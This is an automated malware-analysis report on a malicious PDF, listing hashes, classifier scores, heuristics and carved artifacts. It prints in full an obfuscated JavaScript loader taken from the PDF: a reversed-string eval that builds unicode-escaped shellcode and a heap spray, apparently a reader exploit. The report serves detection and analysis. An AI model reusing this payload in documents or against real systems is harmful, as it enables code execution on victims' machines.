Malicious PDF — malware analysis report

Static analysis result for SHA-256 9e8c527dcd9bff50…

MALICIOUS

PDF

69.0 KB First seen: 2026-05-10
MD5: 5180ef3fbfa08c35569920119582d539 SHA-1: dad45d3eb35d46bc89e39a14de34f253bac71410 SHA-256: 9e8c527dcd9bff50109f3c65268cad0b8186bb2161cc47884bc9e147a8b634cb
68 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9996

Heuristics 4

  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.bitstream.com In PDF document text

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0012_000.js pdf-javascript-stream PDF /JS object 12 at offset 0x104F0 3544 bytes
SHA-256: 35fa1b8486a034154e63037fe78441768f5297eae401972d47c6e8b24d9a2456
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). 41 of 54 identifiers look randomly generated (e.g. 'PaP5PbPePuP') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
var eva=new Function("a","ev     al        (a);".split(" ").join(""));
       var s=' ;"s"+3_ozotlav=]i_ozotlav[4_ozotlav )++i_ozotlav;0f1x0<i_ozotlav;0=i_ozotlav( rof ;)(yarrA wen = 4_ozotlav rav ;)2 / )80x0-0201x0( - 00008x0 ,0(gnirtsbus.d_ozotlav = 3_ozotlav ;d_ozotlav =+ d_ozotlav )00008x0 < htgnel.d_ozotlav(elihw ;)2/63556 ,0(gnirtsbus.b_ozotlav = d_ozotlav ;c_ozotlav =+ b_ozotlav ;olygak =+ b_ozotlav ;)2/)42x0-c0c0x0( ,0(gnirtsbus.c_ozotlav = b_ozotlav ;c_ozotlav=+c_ozotlav )63556 < 8 + 02 + htgnel.c_ozotlav( elihw ;) "c" + "0" + "c" + "0" + "u" + "%" + "c" + "0" + "c" + "0" + "u" + "%" (epak = c_ozotlav rav ;) )""(nioj.)" "(tilps."5614u%4863u%819bu%cf39u%0ba1u%e6fcu%2db7u%e4adu%ca4cu%ddf2u%c34bu%0976u%531bu%2677u%cb9cu%a54fu%6458u%633cu%294bu%e9a1u%f8c9u%1605u%447du%61f4u%fc83u%d7e7u%cc61u%d7c7u%1bf2u%a7ceu%ae12u%e6a4u%0638u%1bfeu%f7bdu%edecu%62d7u%40fau%2e41u%e388u%d2d9u%5b56u%6116u%220au%94d7u%542au%ab17u%0843u%9504u%2c38u%446eu%4160u%f7b9u%96dfu%3085u%6768u%3ce5u%b767u%cf15u%3399u%3fe5u%1d04u%70f5u%4537u%b341u%07f6u%a95eu%bf72u%0ddfu%2482u%ecdau%5b19u%ba96u%589eu%b72eu%538cu%ece9u%687du%511du%5658u%0dbau%0144u%9e06u%3c36u%41a1u%ff0eu%884bu%efccu%ea97u%5316u%1667u%eb30u%3224u%d086u%72e0u%c145u%3354u%d264u%9b0au%ca51u%6385u%2285u%3020u%3511u%4013u%383cu%4fb5u%4742u%3c9du%33abu%ab15u%1b33u%bd6du%929cu%0070u%f211u%0070u%137du%0070u%d451u%ff09u%ffffu%0070u%bb51u%0070u%227au%0070u%d451u%0909u%0909u%0070u%bb51u%0070u%227au%0070u%d451u%0909u%0909u%0070u%bb51u%0070u%227au%0070u%d451u%0909u%ff09u%0070u%bb51u%0070u%227au%0070u%d451u%ffffu%8e6eu%0070u%bb51u%0P0P7P0PuP%P2P2P7PaPuP%P0P0P7P0PuP%PdP4P5P1PuP%PbPeP5P0PuP%P5P7PePePuP%P0P0P7P0PuP%PbPbP5P1PuP%P0P0P7P0PuP%P2P2P7PaPuP%P0P0P7P0PuP%PdP4P5P1PuP%PcP0PcP0PuP%PcP0PcP0PuP%P0P0P7P0PuP%PbPbP5P1PuP%P0P0P7P0PuP%P2P2P7PaPuP%P0P0P7P0PuP%PdP4P5P1PuP%P1P8PbPfPuP%P2PcP4P0PuP%P0P0P7P0PuP%PbPbP5P1PuP%P0P0P7P0PuP%P2P2P7PaPuP%P0P0P7P0PuP%PdP4P5P1PuP%P4P0P3P8PuP%P3P8P0PcPuP%P0P0P7P0PuP%PbPbP5P1PuP%P0P0P7P0PuP%P2P2P7PaPuP%P0P0P7P0PuP%PdP4P5P1PuP%P9P8P8P1PuP%PbP8PaP1PuP%P0P0P7P0PuP%PbPbP5P1PuP%P0P0P7P0PuP%P2P2P7PaPuP%P0P0P7P0PuP%PdP4P5P1PuP%P5P1P8P5PuP%PaP5PbPePuP%P0P0P7P0PuP%PbPbP5P1PuP%P0P0P7P0PuP%P2P2P7PaPuP%P0P0P7P0PuP%PdP4P5P1PuP%P4P5P0P9PuP%PaP5P0P9PuP%P0P0P7P0PuP%PbPbP5P1PuP%P0P0P7P0PuP%P1P3P7PdPuP%P0P0P0P0PuP%P0P4P0P0PuP%P0P0P0P0PuP%P0P0P0P1PuP%P1P0P0P0PuP%P4P0P1P0PuP%P0P0P0P0PuP%P0P0P0P0PuP%P1P0P0P0PuP%P0P0P1P0PuP%PfPfPfPfPuP%PfPfPfPfPuP%P0P0P7P0PuP%P4P5PcP5PuP%P0P0P7P0PuP%P2PeP2P5PuP%P1P0P0P0PuP%P1P1P0P0PuP%P0P0P7P0PuP%P7PfP2P7PuP%P0P0P7P0PuP%PcPaP8PaPuP%P1P0P0P0PuP%P0P0P1P0PuP%P0P0P7P0PuP%PbPbP5P1PuP%P0P0P7P0PuP%PcPaP8PaPuP%P1P0P0P0PuP%P1P1P0P0PuP%P0P0P7P0PuP%PbPbP5P1PuP%P0P0P7P0PuP%P2PbPfP7PuP%PePfPfP7PuP%P0P0P3P0PuP%P0P0P7P0PuP%PbPbP5P1PuP%P0P0P7P0PuP%PdP4P5P1PuP%P0P0P0P0PuP%P0P0P0P1PuP%P0P0P7P0PuP%PbPbP5P1PuP%P1P0P0P0PuP%P4P0P1P0PuP%P0P0P7P0PuP%P7PfP2P7PuP%P1P0P0P0PuP%P4P2P1P0PuP%P0P0P7P0PuP%P9P9P5P1PuP%P0P0P7P0PuP%P4P8P0P9PuP%P0P0P7P0PuP%P4P8P0P9PuP%P0P0P7P0PuP%P4P8P0P9PuP%P0P0P7P0PuP%P4P8P0P9PuP%P0P0P7P0PuP%P4P8P0P9PuP%P0P0P7P0PuP%P4P8P0P9PuP%P0P0P7P0PuP%P4P8P0P9PuP%P0P0P7P0PuP%P4P8P0P9PuP%PcP0PcP0PuP%PcP0PcP0PuP%P0P0P7P0PuP%P4P8P0P9PuP%P0P0P7P0PuP%P3P3P0P9PuP%P0P0P7P0PuP%P4P8P0P9PuP%P0P0P7P0PuP%P4P8P0P9PuP%P0P0P7P0PuP%P4P8P0P9PuP%P0P0P7P0PuP%P4P8P0P9PuP%P0P0P7P0PuP%P4P8P0P9PuP%P0P0P7P0PuP%P4P8P0P9PuP%PcPcPcPcPuP%PcPcPcPcPuP%P0P0P7P0PuP%PfP6P5P1PuP%P0P0P7P0PuP%PfPeP8P4PuP%PcPcPcPcPuP%PcPcPcPcPuP%P0P0P7P0PuP%P9P1P9P4PuP%PcP0PcP0PuP%PcP0PcP0PuP%P" (epak = olygak rav ;epacsenu = epak rav ';
eva(s.split("").reverse().join(""));
font_00_sfnt_off00000319.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x319 65932 bytes
SHA-256: 67cf5b115c479e7cc69ef02607414d718125a1e117a59d537db3e97682d5b723
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)